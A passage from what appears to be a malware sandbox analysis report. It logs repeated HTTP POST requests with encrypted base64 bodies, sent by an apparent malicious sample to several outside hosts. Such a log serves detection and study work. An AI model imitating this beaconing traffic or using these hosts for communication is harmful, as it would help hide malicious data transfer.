44 77 7a 37 2f 57 51 57 6e 46 45 72 74 34 78 5a 49 6b 50 47 53 42 4b 6c 38 50 59 4e 34 68 41 59 30 34 33 41 51 78 73 72 50 46 6b 6c 4c 77 4e 2f 51 55 50 78 4a 63 47 6f 35 33 38 41 5a 42 70 6d 73 68 46 62 5a 66 55 37 50 61 4f 51 6b 68 41 69 63 4b 32 69 44 6b 71 64 47 6e 64 6a 52 72 5a 4f 43 52 43 6c 51 73 42 76 50 72 44 54 33 71 45 57 74 66 76 4b 61 42 6d 75 31 76 51 39 2b 39 61 64 6d 4a 65 48 73 67 30 38 31 4c 6e 72 34 46 51 51 59 2f 6e 45 36 57 52 31 70 59 53 30 50 6d 56 38 4f 43 31 30 4b 37 49 79 50 4e 69 73 48 6e 69 4b 53 4d 75 2b 67 52 39 46 71 51 52 50 61 34 61 65 71 56 39 39 4c 59 30 74 4f 70 78 62 2b 32 7a 37 50 38 72 74 72 6d 38 63 6f 6b 4e 59 4a 6c 6a 50 30 4c 36 6c 75 71 62 38 34 39 4a 6b 69 44 51 44 65 37 71 52 67 34 66 34 31 62 6f 55 64 4b 6b 76 76 36 57 2f 57 6b 70 39 4a 41 32 74 71 68 74 50 73 73 52 74 6d 6d 4d 2f 7a 50 59 66 56 65 55 4c 77 53 4c 6f 55 70 4b 73 61 53 2b 43 30 56 37 73 64 37 4d 4f 6f 32 34 61 43 4f 49 7a 67 79 31 53 4e 34 3d Data Ascii: vP6rrXEcrmdGsHshkGukpsqJMauvhnhSNcKq6k3bPefMS3YCAUil32L2k2neyalc2FByBgWfL0eUi3rgem0i89DerJcMc5FAab3CO8VAm5wAK3OpDg8fFnb5STL/BuXuP2f9AX+qEJnu9MAE6BCCYxwHy60j9T3QealQQUHOs2elggoYJ9Ta2MpThZ1jHUfwEwNuqeogl+DaIXd2nIT7bDwz7/WQWnFErt4xZIkPGSBKl8PYN4hAY043AQxsrPFklLwN/QUPxJcGo538AZBpmshFbZfU7PaOQkhAicK2iDkqdGndjRrZOCRClQsBvPrDT3qEWtfvKaBmu1vQ9+9admJeHsg081Lnr4FQQY/nE6WR1pYS0PmV8OC10K7IyPNisHniKSMu+gR9FqQRPa4aeqV99LY0tOpxb+2z7P8rtrm8cokNYJljP0L6luqb849JkiDQDe7qRg4f41boUdKkvv6W/Wkp9JA2tqhtPssRtmmM/zPYfVeULwSLoUpKsaS+C0V7sd7MOo24aCOIzgy1SN4=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.stnic.co.ukCache-Control: no-cacheData Raw: 33 45 56 36 61 6b 32 4f 76 47 66 39 72 63 57 7a 78 4e 73 35 68 77 62 45 78 5a 47 37 6f 77 2f 48 30 63 4f 53 69 4f 4a 6f 69 7a 39 63 4e 57 6a 42 68 64 38 78 73 34 46 45 53 44 4c 51 4e 71 4b 76 78 6c 49 43 48 79 31 70 4e 61 4d 78 74 64 42 50 79 64 41 4c 41 6b 6b 48 69 79 42 57 45 53 4c 4c 46 70 7a 33 44 54 32 2b 50 56 5a 4b 59 75 57 64 69 55 78 61 36 46 7a 36 51 59 7a 51 75 69 59 54 33 55 4a 77 32 66 30 61 77 30 4b 72 2f 4d 2f 6b 2f 42 4b 4f 4c 64 56 74 7a 37 68 32 79 4a 47 70 46 2b 36 6d 4f 4f 43 31 68 2f 62 62 33 64 75 73 71 77 48 30 7a 4d 32 31 6d 6a 5a 44 52 4d 63 50 6f 7a 49 37 6c 38 2b 58 6e 57 69 6b 77 6c 74 47 77 73 6d 44 30 71 71 49 35 39 67 7a 2b 33 38 6c 62 49 70 74 41 65 2b 38 79 53 32 42 41 31 73 77 72 32 7a 78 79 79 71 31 58 73 4a 6e 79 70 45 74 2f 6d 46 4a 4b 48 48 6e 71 7a 6d 44 72 76 73 59 42 37 6d 56 69 73 7a 37 68 41 75 6f 38 44 49 53 36 4c 5a 42 6a 70 2b 4f 69 53 41 69 4c 31 52 44 4d 2f 56 4a 41 77 35 4b 59 4b 56 74 62 4b 59 68 59 48 64 57 31 4a 37 67 61 4f 67 54 6d 74 78 6e 53 48 76 38 32 33 5a 37 4a 69 49 61 78 4f 56 6e 4f 4a 61 56 73 78 6f 31 2b 72 64 6e 4a 73 4c 2b 58 74 57 55 2f 76 59 62 55 69 39 67 2b 62 47 55 45 45 44 56 51 51 45 4a 78 2b 63 50 43 59 66 51 4b 61 42 61 38 49 42 66 76 38 52 54 63 70 64 56 78 31 6d 32 2b 30 64 59 35 76 6f 34 6b 67 62 34 51 41 5a 62 52 31 6a 48 4a 53 41 51 4b 4c 56 55 32 4d 32 47 78 33 32 51 2b 44 6f 6a 62 4c 50 33 4f 59 53 70 6e 73 52 55 35 55 33 75 76 7a 39 36 4f 61 56 78 4b 54 49 43 4a 4c 61 47 33 71 44 4c 72 67 42 76 72 6f 46 2f 72 68 59 35 46 4b 6a 34 54 6b 6a 78 70 4b 33 77 4a 44 58 42 6e 43 4c 64 62 6f 52 7a 7a 6b 76 67 49 55 34 79 4d 72 79 61 41 73 49 75 Data Ascii: 3EV6ak2OvGf9rcWzxNs5hwbExZG7ow/H0cOSiOJoiz9cNWjBhd8xs4FESDLQNqKvxlICHy1pNaMxtdBPydALAkkHiyBWESLLFpz3DT2+PVZKYuWdiUxa6Fz6QYzQuiYT3UJw2f0aw0Kr/M/k/BKOLdVtz7h2yJGpF+6mOOC1h/bb3dusqwH0zM21mjZDRMcPozI7l8+XnWikwltGwsmD0qqI59gz+38lbIptAe+8yS2BA1swr2zxyyq1XsJnypEt/mFJKHHnqzmDrvsYB7mVisz7hAuo8DIS6LZBjp+OiSAiL1RDM/VJAw5KYKVtbKYhYHdW1J7gaOgTmtxnSHv823Z7JiIaxOVnOJaVsxo1+rdnJsL+XtWU/vYbUi9g+bGUEEDVQQEJx+cPCYfQKaBa8IBfv8RTcpdVx1m2+0dY5vo4kgb4QAZbR1jHJSAQKLVU2M2Gx32Q+DojbLP3OYSpnsRU5U3uvz96OaVxKTICJLaG3qDLrgBvroF/rhY5FKj4TkjxpK3wJDXBnCLdboRzzkvgIU4yMryaAsIu
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 572User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.netcr.comCache-Control: no-cacheData Raw: 6c 77 6d 36 5a 68 35 76 76 47 65 63 6e 52 30 52 61 59 73 30 62 77 46 4f 4e 48 74 65 70 31 37 41 4d 76 45 6d 43 4c 49 73 78 41 59 4d 45 70 53 52 2b 48 50 37 77 31 69 38 5a 49 34 76 4c 74 59 67 50 6f 45 4c 6b 66 75 46 4d 46 64 75 79 2b 49 65 71 77 62 47 7a 49 49 63 4b 7a 4d 2f 49 48 30 6d 47 74 70 4c 53 39 58 31 64 4f 7a 7a 72 49 56 57 42 51 43 73 7a 61 64 53 31 73 35 59 45 67 73 6d 75 61 71 36 54 44 56 39 38 6b 71 58 58 56 68 74 38 61 75 4f 34 35 46 4e 48 50 49 62 74 41 51 43 30 6f 41 4d 4c 4a 38 34 58 4b 56 30 33 78 66 33 4b 71 57 34 76 76 77 62 43 6d 4b 58 39 62 73 5a 64 4d 37 78 72 65 35 77 64 50 30 52 65 6d 4f 5a 5a 76 63 45 79 4e 62 67 44 62 36 77 71 4c 31 31 66 58 37 34 6c 67 6e 35 68 58 4a 4e 32 42 69 77 68 6f 46 77 2b 64 48 35 32 61 33 74 4c 4b 70 50 53 68 78 71 5a 39 73 6b 6d 31 69 41 71 71 6c 72 4f 30 47 62 66 7a 62 35 49 70 4b 4e 32 56 57 6a 4f 73 2f 77 4b 64 78 62 4e 54 30 41 76 4c 49 44 32 62 68 36 2f 31 75 6e 64 37 38 4f 75 31 6b 59 59 4d 62 35 4e 76 4f 67 58 42 34 46 38 66 53 70 50 6c 65 35 44 61 7a 2f 44 46 6d 54 56 6a 53 5a 42 6b 6a 42 52 49 66 33 6e 69 49 6f 7a 64 4b 4a 67 6c 66 72 50 64 36 34 33 2f 4b 59 51 62 4d 6f 6f 61 42 34 6e 54 6a 7a 75 34 37 76 70 47 6b 4b 77 78 72 41 2b 33 46 63 41 5a 6e 6f 63 65 72 42 53 6c 4a 4e 32 72 53 65 4a 58 48 36 32 4b 39 57 6c 52 74 39 4b 41 7a 41 74 4a 37 34 4b 53 45 46 57 56 34 5a 48 4c 6b 67 75 72 63 78 48 32 64 43 43 4e 47 44 30 65 56 42 2b 4c 67 35 62 42 67 34 6c 42 34 58 58 4b 7a 6a 2b 45 36 45 66 5a 4e 62 58 48 4d 38 6e 55 39 4e 58 77 37 34 31 6b 4b 6d 64 4a 61 51 65 79 61 58 6f 2f 68 6c 39 6a 67 39 43 42 6c 55 4a 35 37 39 65 61 4a 45 66 7a 36 64 77 6d 6c 66 35 71 46 46 36 73 6b 36 6b 6c 52 35 74 61 37 35 6d 69 30 4d 34 68 47 41 Data Ascii: lwm6Zh5vvGecnR0RaYs0bwFONHtep17AMvEmCLIsxAYMEpSR+HP7w1i8ZI4vLtYgPoELkfuFMFduy+IeqwbGzIIcKzM/IH0mGtpLS9X1dOzzrIVWBQCszadS1s5YEgsmuaq6TDV98kqXXVht8auO45FNHPIbtAQC0oAMLJ84XKV03xf3KqW4vvwbCmKX9bsZdM7xre5wdP0RemOZZvcEyNbgDb6wqL11fX74lgn5hXJN2BiwhoFw+dH52a3tLKpPShxqZ9skm1iAqqlrO0Gbfzb5IpKN2VWjOs/wKdxbNT0AvLID2bh6/1und78Ou1kYYMb5NvOgXB4F8fSpPle5Daz/DFmTVjSZBkjBRIf3niIozdKJglfrPd643/KYQbMooaB4nTjzu47vpGkKwxrA+3FcAZnocerBSlJN2rSeJXH62K9WlRt9KAzAtJ74KSEFWV4ZHLkgurcxH2dCCNGD0eVB+Lg5bBg4lB4XXKzj+E6EfZNbXHM8nU9NXw741kKmdJaQeyaXo/hl9jg9CBlUJ579eaJEfz6dwmlf5qFF6sk6klR5ta75mi0M4hGA
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.speelhal.netCache-Control: no-cacheData Raw: 31 6c 45 56 66 55 51 34 70 47 63 56 43 67 62 4c 58 2b 62 55 62 42 65 38 30 53 46 38 4e 76 67 56 75 43 6e 6d 69 58 31 48 52 6a 6c 36 42 62 68 33 74 6d 6f 38 69 66 49 6d 73 58 64 6c 5a 53 2b 65 54 38 37 38 41 2b 70 46 6f 71 56 50 35 54 31 42 55 4e 78 6b 78 63 4b 4d 49 75 37 63 39 5a 75 5a 59 72 4c 2b 64 4d 4d 46 6e 67 59 51 59 76 39 45 63 54 66 42 6a 4b 79 46 64 39 47 34 35 2b 50 47 72 71 67 4c 54 52 59 42 57 59 53 49 44 38 64 54 65 37 37 4b 44 71 57 5a 36 46 44 32 52 37 42 51 34 31 6f 4d 53 4d 59 30 62 58 73 6c 70 38 51 37 4d 6f 6c 49 4b 43 4d 47 47 46 4c 75 49 68 59 6b 4a 6b 63 64 72 48 48 54 62 62 56 73 79 52 7a 6f 6d 51 5a 6e 52 44 47 48 64 34 4d 6c 56 32 49 77 33 43 76 66 37 2b 66 2f 50 66 74 36 77 77 41 7a 49 76 48 72 42 64 49 35 64 77 72 74 58 4e 57 4f 38 55 4d 30 6e 43 65 55 44 31 51 38 67 46 47 42 4c 6e 6c 63 46 66 78 52 61 43 30 54 4e 2b 2f 46 6a 6f 32 71 41 47 4f 72 2b 52 49 50 52 69 4c 34 74 2b 6d 79 33 75 2f 43 37 42 2f 44 61 4e 30 53 4a 49 5a 74 41 54 4b 69 78 51 54 4e 48 4a 6d 56 65 34 62 68 30 57 39 6d 54 73 38 69 65 47 48 39 47 4b 4e 30 2f 61 6f 35 36 75 4a 2b 5a 74 54 48 52 4f 37 46 42 43 46 62 64 56 76 4d 42 73 34 4b 4f 4a 48 48 62 69 43 31 6b 70 54 42 47 68 64 65 74 4b 78 76 76 31 47 57 41 50 35 39 58 5a 58 66 79 5a 39 42 36 32 54 59 4f 6a 63 46 74 61 43 36 72 52 48 57 4f 69 32 77 4d 4b 75 32 66 41 35 67 4c 5a 68 79 56 58 41 71 4a 30 6c 68 6a 50 79 68 50 43 69 78 75 78 74 74 5a 33 67 44 4d 38 31 51 49 39 67 67 4a 6c 66 73 65 30 34 6d 62 6e 76 32 53 4e 4a 6f 55 79 30 73 4c 55 4a 5a 67 48 49 71 72 69 63 57 65 6f 65 34 74 78 4c 34 4f 6b 58 55 44 30 41 66 77 54 66 77 56 74 6f 2f 33 61 70 6d 6a 41 52 6f 55 58 77 42 34 41 3d 3d Data Ascii: 1lEVfUQ4pGcVCgbLX+bUbBe80SF8NvgVuCnmiX1HRjl6Bbh3tmo8ifImsXdlZS+eT878A+pFoqVP5T1BUNxkxcKMIu7c9ZuZYrL+dMMFngYQYv9EcTfBjKyFd9G45+PGrqgLTRYBWYSID8dTe77KDqWZ6FD2R7BQ41oMSMY0bXslp8Q7MolIKCMGGFLuIhYkJkcdrHHTbbVsyRzomQZnRDGHd4MlV2Iw3Cvf7+f/Pft6wwAzIvHrBdI5dwrtXNWO8UM0nCeUD1Q8gFGBLnlcFfxRaC0TN+/Fjo2qAGOr+RIPRiL4t+my3u/C7B/DaN0SJIZtATKixQTNHJmVe4bh0W9mTs8ieGH9GKN0/ao56uJ+ZtTHRO7FBCFbdVvMBs4KOJHHbiC1kpTBGhdetKxvv1GWAP59XZXfyZ9B62TYOjcFtaC6rRHWOi2wMKu2fA5gLZhyVXAqJ0lhjPyhPCixuxttZ3gDM81QI9ggJlfse04mbnv2SNJoUy0sLUJZgHIqricWeoe4txL4OkXUD0AfwTfwVto/3apmjARoUXwB4A==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.com-sit.comCache-Control: no-cacheData Raw: 31 4d 56 44 4a 71 37 33 79 6d 66 61 71 77 51 74 75 64 74 71 6b 42 45 78 59 49 30 75 67 7a 6d 37 77 6a 71 72 79 57 4e 57 35 62 52 2f 51 43 52 72 53 31 42 67 77 30 4b 6d 48 4a 61 6d 58 5a 57 30 56 68 63 5a 58 62 32 6a 30 44 50 58 44 2f 63 70 67 59 4b 78 74 34 6f 4c 70 61 6a 66 68 79 4a 6b 37 58 49 6d 70 2b 7a 71 30 69 2f 71 66 76 6e 53 51 61 36 44 59 63 6a 47 50 4b 32 73 58 6d 70 6f 62 62 35 34 6f 63 4c 49 6b 62 6c 66 4f 6b 33 41 76 62 73 47 35 55 42 42 42 45 53 64 66 55 68 6b 58 4b 31 6e 6e 75 57 33 51 51 63 2f 35 66 4b 63 2b 33 2f 39 76 75 36 47 46 74 34 4a 72 42 6b 33 63 56 76 2f 6e 59 32 4c 6c 4c 43 70 38 52 59 50 59 75 4f 6c 72 42 2b 52 57 70 6e 42 77 4f 58 68 71 44 30 4a 4e 38 6d 74 4f 57 74 6d 53 6e 42 4a 79 50 69 4c 63 55 6a 75 62 50 58 76 48 47 34 38 33 69 72 59 67 4b 56 64 70 4f 54 48 59 73 53 45 37 6e 6f 77 50 34 69 4b 62 4c 32 73 6c 6c 2f 59 72 54 4b 4f 63 41 4a 5a 33 6e 6c 2f 50 57 65 4f 4f 33 7a 69 6b 66 50 6e 6d 2f 4c 4b 53 68 6a 77 70 39 6a 66 30 6e 79 4c 62 5a 50 4d 52 54 6e 55 34 35 35 7a 6d 2b 30 4b 43 33 68 65 47 50 43 33 37 70 64 70 54 75 62 36 64 77 59 4a 49 4e 38 4d 37 4a 4d 61 68 2b 6e 7a 37 4a 64 4d 69 30 76 2b 44 44 65 59 4c 41 74 72 52 71 36 47 42 71 78 45 61 4e 4e 56 35 63 41 42 36 47 58 2b 43 48 36 56 72 50 74 4c 6f 69 6b 59 49 66 79 36 70 47 59 37 76 6e 4f 33 59 6d 77 41 71 50 47 2b 39 38 49 5a 78 44 6c 50 72 73 30 49 7a 70 71 4c 71 56 64 45 6b 63 57 59 71 5a 69 48 6c 36 36 31 43 6d 31 47 6d 38 4a 74 69 38 4a 50 71 77 7a 4d 48 4e 6d 72 65 72 72 74 4c 51 67 50 45 6f 67 43 52 76 6e 65 48 65 63 4b 65 35 30 51 7a 62 43 32 2f 65 6a 63 36 74 62 75 42 66 44 4e 30 41 66 67 4a 4e 55 3d Data Ascii: 1MVDJq73ymfaqwQtudtqkBExYI0ugzm7wjqryWNW5bR/QCRrS1Bgw0KmHJamXZW0VhcZXb2j0DPXD/cpgYKxt4oLpajfhyJk7XImp+zq0i/qfvnSQa6DYcjGPK2sXmpobb54ocLIkblfOk3AvbsG5UBBBESdfUhkXK1nnuW3QQc/5fKc+3/9vu6GFt4JrBk3cVv/nY2LlLCp8RYPYuOlrB+RWpnBwOXhqD0JN8mtOWtmSnBJyPiLcUjubPXvHG483irYgKVdpOTHYsSE7nowP4iKbL2sll/YrTKOcAJZ3nl/PWeOO3zikfPnm/LKShjwp9jf0nyLbZPMRTnU455zm+0KC3heGPC37pdpTub6dwYJIN8M7JMah+nz7JdMi0v+DDeYLAtrRq6GBqxEaNNV5cAB6GX+CH6VrPtLoikYIfy6pGY7vnO3YmwAqPG+98IZxDlPrs0IzpqLqVdEkcWYqZiHl661Cm1Gm8Jti8JPqwzMHNmrerrtLQgPEogCRvneHecKe50QzbC2/ejc6tbuBfDN0AfgJNU=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fink.comCache-Control: no-cacheData Raw: 53 72 75 39 69 78 58 7a 78 57 66 4f 74 50 31 78 2f 4b 6c 6a 48 51 34 73 38 66 73 6a 4c 48 2b 66 47 56 46 63 73 73 74 56 33 46 47 71 52 61 78 39 43 43 6f 42 33 37 6b 71 4a 48 69 33 4e 50 43 71 4a 34 4e 4e 71 30 4d 37 63 72 4e 5a 32 52 4d 43 4d 67 4a 54 38 59 76 74 41 31 6b 2b 56 6e 44 58 72 39 5a 6f 33 35 35 53 51 55 32 36 69 42 55 48 4b 4c 33 6d 62 6a 46 4b 31 50 69 56 7a 41 44 6e 5a 71 39 54 73 37 54 2f 69 57 34 4b 5a 49 78 36 56 44 47 7a 58 5a 6d 46 58 56 51 70 56 5a 2b 75 4d 54 70 4a 33 6a 4b 67 7a 5a 41 5a 41 45 48 48 7a 75 6e 4f 53 64 4c 44 76 35 6f 75 63 53 76 42 68 6e 76 35 31 70 7a 61 51 33 4e 68 47 2f 37 75 76 49 31 57 66 2f 4f 72 55 35 43 64 30 57 4c 52 48 4e 73 4b 34 34 47 39 41 78 79 6b 4e 52 38 6e 4f 38 39 37 30 37 31 58 35 71 69 42 6f 6b 4d 47 37 2f 56 75 77 46 70 49 4d 7a 43 6e 75 73 51 6d 52 4d 2b 74 51 35 61 4a 50 59 57 4e 30 2b 55 57 44 2f 74 58 63 41 33 66 53 4e 53 6c 49 66 50 6b 6c 50 61 6d 32 35 7a 49 46 43 5a 71 49 4b 4f 35 48 4e 63 4d 33 43 6a 76 6d 70 43 33 46 55 59 69 6a 36 2b 68 6b 2f 69 78 4c 54 2f 55 68 69 39 38 77 43 4b 6b 54 49 36 70 61 4f 76 46 6d 69 49 30 6a 56 50 43 77 66 4b 72 2f 37 4e 64 54 69 73 43 6c 5a 46 4e 79 48 4c 61 67 53 43 6b 76 6a 35 43 76 6a 4d 37 65 47 6d 34 7a 58 62 54 62 75 71 55 6a 50 61 79 69 67 76 64 66 57 44 4d 43 6a 33 65 6e 45 69 2f 74 5a 69 6a 63 6d 54 63 68 78 38 7a 4e 48 41 67 56 36 6c 6c 30 6d 55 4f 78 50 41 43 73 75 45 6e 65 55 35 64 7a 55 2b 63 58 31 67 38 31 73 41 4c 79 4b 79 2f 56 79 52 76 75 43 55 49 67 50 73 36 4e 77 37 54 4e 69 6c 33 4e 61 2f 6e 4e 75 62 59 62 52 31 2f 75 47 50 38 2f 4f 37 70 53 2b 50 72 56 78 32 52 5a 4f 6d 66 64 55 45 3d Data Ascii: Sru9ixXzxWfOtP1x/KljHQ4s8fsjLH+fGVFcsstV3FGqRax9CCoB37kqJHi3NPCqJ4NNq0M7crNZ2RMCMgJT8YvtA1k+VnDXr9Zo355SQU26iBUHKL3mbjFK1PiVzADnZq9Ts7T/iW4KZIx6VDGzXZmFXVQpVZ+uMTpJ3jKgzZAZAEHHzunOSdLDv5oucSvBhnv51pzaQ3NhG/7uvI1Wf/OrU5Cd0WLRHNsK44G9AxykNR8nO897071X5qiBokMG7/VuwFpIMzCnusQmRM+tQ5aJPYWN0+UWD/tXcA3fSNSlIfPklPam25zIFCZqIKO5HNcM3CjvmpC3FUYij6+hk/ixLT/Uhi98wCKkTI6paOvFmiI0jVPCwfKr/7NdTisClZFNyHLagSCkvj5CvjM7eGm4zXbTbuqUjPayigvdfWDMCj3enEi/tZijcmTchx8zNHAgV6ll0mUOxPACsuEneU5dzU+cX1g81sALyKy/VyRvuCUIgPs6Nw7TNil3Na/nNubYbR1/uGP8/O7pS+PrVx2RZOmfdUE=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.maktraxx.comCache-Control: no-cacheData Raw: 5a 6a 53 73 5a 71 74 75 76 47 64 52 37 6c 43 67 67 72 54 4c 59 78 53 75 34 67 78 78 5a 6f 38 43 44 2b 74 6a 78 6f 41 73 46 49 36 58 52 67 6b 55 37 4d 34 41 63 68 38 44 51 51 36 43 43 78 2b 37 6c 63 43 62 38 35 59 48 32 41 72 62 52 4b 32 68 73 44 71 50 43 45 43 6c 30 50 70 6c 49 73 64 4d 72 71 48 67 56 38 61 2b 76 4c 62 70 4a 54 7a 35 48 77 64 38 50 75 69 6b 6a 30 67 30 76 69 62 50 41 38 7a 31 39 78 62 44 6c 30 4c 54 54 72 70 45 76 50 6f 6a 6e 63 7a 2b 44 78 4e 68 79 55 73 5a 69 35 53 31 6a 56 77 53 6e 44 2f 47 7a 66 75 78 72 74 77 37 7a 4d 64 52 42 50 4b 57 4b 6f 31 2b 76 48 7a 2f 58 68 4c 58 5a 6b 70 6a 74 36 4f 66 64 76 6e 68 77 59 6e 4a 6d 6f 63 4e 43 6a 46 36 77 62 58 71 43 78 59 4d 39 42 4e 4c 52 66 52 36 72 4b 33 31 4e 43 4e 69 59 48 7a 2b 48 61 2b 46 42 36 47 4b 4d 46 65 43 61 58 36 71 74 32 67 63 6a 6f 39 4a 67 39 4d 58 77 75 68 69 53 56 59 52 69 45 4a 55 44 48 49 56 2f 5a 69 4e 53 35 50 6c 76 7a 48 63 57 41 71 54 2b 47 45 6c 6d 44 4b 71 64 76 38 2b 48 6b 4a 56 49 58 6a 35 61 6a 76 51 54 5a 4c 4e 34 31 32 63 36 61 77 38 58 41 64 44 75 47 70 36 4d 33 35 2b 75 57 33 49 59 61 36 78 43 67 65 4d 53 69 42 6e 33 66 4c 53 58 59 70 7a 4d 70 72 4b 59 57 32 54 4f 62 71 33 4d 6e 7a 4b 43 39 32 2b 6d 70 4e 2f 6e 35 75 35 37 71 78 47 32 57 70 31 34 4f 51 54 66 73 4c 6d 37 63 43 65 5a 49 4b 42 58 74 50 79 2f 4e 4d 32 7a 79 51 64 33 4b 66 68 2b 76 70 31 57 4f 30 6e 62 75 49 72 67 71 2f 62 4f 77 65 65 5a 71 67 39 72 6a 45 4e 46 6f 45 36 6a 79 6a 5a 6d 62 6e 6d 39 78 68 66 49 37 2f 35 59 70 55 46 77 62 7a 34 53 66 5a 53 37 6a 61 2b 48 59 6e 52 4d 2b 39 2b 44 41 33 70 30 44 6d 46 6e 51 71 42 79 6b 4c 73 78 59 63 3d Data Ascii: ZjSsZqtuvGdR7lCggrTLYxSu4gxxZo8CD+tjxoAsFI6XRgkU7M4Ach8DQQ6CCx+7lcCb85YH2ArbRK2hsDqPCECl0PplIsdMrqHgV8a+vLbpJTz5Hwd8Puikj0g0vibPA8z19xbDl0LTTrpEvPojncz+DxNhyUsZi5S1jVwSnD/Gzfuxrtw7zMdRBPKWKo1+vHz/XhLXZkpjt6OfdvnhwYnJmocNCjF6wbXqCxYM9BNLRfR6rK31NCNiYHz+Ha+FB6GKMFeCaX6qt2gcjo9Jg9MXwuhiSVYRiEJUDHIV/ZiNS5PlvzHcWAqT+GElmDKqdv8+HkJVIXj5ajvQTZLN412c6aw8XAdDuGp6M35+uW3IYa6xCgeMSiBn3fLSXYpzMprKYW2TObq3MnzKC92+mpN/n5u57qxG2Wp14OQTfsLm7cCeZIKBXtPy/NM2zyQd3Kfh+vp1WO0nbuIrgq/bOweeZqg9rjENFoE6jyjZmbnm9xhfI7/5YpUFwbz4SfZS7ja+HYnRM+9+DA3p0DmFnQqBykLsxYc=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.stnic.co.ukCache-Control: no-cacheData Raw: 33 45 56 36 61 6b 32 4f 76 47 66 39 72 63 57 7a 78 4e 73 35 68 77 62 45 78 5a 47 37 6f 77 2f 48 30 63 4f 53 69 4f 4a 6f 69 7a 39 63 4e 57 6a 42 68 64 38 78 73 34 46 45 53 44 4c 51 4e 71 4b 76 78 6c 49 43 48 79 31 70 4e 61 4d 78 74 64 42 50 79 64 41 4c 41 6b 6b 48 69 79 42 57 45 53 4c 4c 46 70 7a 33 44 54 32 2b 50 56 5a 4b 59 75 57 64 69 55 78 61 36 46 7a 36 51 59 7a 51 75 69 59 54 33 55 4a 77 32 66 30 61 77 30 4b 72 2f 4d 2f 6b 2f 42 4b 4f 4c 64 56 74 7a 37 68 32 79 4a 47 70 46 2b 36 6d 4f 4f 43 31 68 2f 62 62 33 64 75 73 71 77 48 30 7a 4d 32 31 6d 6a 5a 44 52 4d 63 50 6f 7a 49 37 6c 38 2b 58 6e 57 69 6b 77 6c 74 47 77 73 6d 44 30 71 71 49 35 39 67 7a 2b 33 38 6c 62 49 70 74 41 65 2b 38 79 53 32 42 41 31 73 77 72 32 7a 78 79 79 71 31 58 73 4a 6e 79 70 45 74 2f 6d 46 4a 4b 48 48 6e 71 7a 6d 44 72 76 73 59 42 37 6d 56 69 73 7a 37 68 41 75 6f 38 44 49 53 36 4c 5a 42 6a 70 2b 4f 69 53 41 69 4c 31 52 44 4d 2f 56 4a 41 77 35 4b 59 4b 56 74 62 4b 59 68 59 48 64 57 31 4a 37 67 61 4f 67 54 6d 74 78 6e 53 48 76 38 32 33 5a 37 4a 69 49 61 78 4f 56 6e 4f 4a 61 56 73 78 6f 31 2b 72 64 6e 4a 73 4c 2b 58 74 57 55 2f 76 59 62 55 69 39 67 2b 62 47 55 45 45 44 56 51 51 45 4a 78 2b 63 50 43 59 66 51 4b 61 42 61 38 49 42 66 76 38 52 54 63 70 64 56 78 31 6d 32 2b 30 64 59 35 76 6f 34 6b 67 62 34 51 41 5a 62 52 31 6a 48 4a 53 41 51 4b 4c 56 55 32 4d 32 47 78 33 32 51 2b 44 6f 6a 62 4c 50 33 4f 59 53 70 6e 73 52 55 35 55 33 75 76 7a 39 36 4f 61 56 78 4b 54 49 43 4a 4c 61 47 33 71 44 4c 72 67 42 76 72 6f 46 2f 72 68 59 35 46 4b 6a 34 54 6b 6a 78 70 4b 33 77 4a 44 58 42 6e 43 4c 64 62 6f 52 7a 7a 6b 76 67 49 55 34 79 4d 72 79 61 41 73 49 75 Data Ascii: 3EV6ak2OvGf9rcWzxNs5hwbExZG7ow/H0cOSiOJoiz9cNWjBhd8xs4FESDLQNqKvxlICHy1pNaMxtdBPydALAkkHiyBWESLLFpz3DT2+PVZKYuWdiUxa6Fz6QYzQuiYT3UJw2f0aw0Kr/M/k/BKOLdVtz7h2yJGpF+6mOOC1h/bb3dusqwH0zM21mjZDRMcPozI7l8+XnWikwltGwsmD0qqI59gz+38lbIptAe+8yS2BA1swr2zxyyq1XsJnypEt/mFJKHHnqzmDrvsYB7mVisz7hAuo8DIS6LZBjp+OiSAiL1RDM/VJAw5KYKVtbKYhYHdW1J7gaOgTmtxnSHv823Z7JiIaxOVnOJaVsxo1+rdnJsL+XtWU/vYbUi9g+bGUEEDVQQEJx+cPCYfQKaBa8IBfv8RTcpdVx1m2+0dY5vo4kgb4QAZbR1jHJSAQKLVU2M2Gx32Q+DojbLP3OYSpnsRU5U3uvz96OaVxKTICJLaG3qDLrgBvroF/rhY5FKj4TkjxpK3wJDXBnCLdboRzzkvgIU4yMryaAsIu
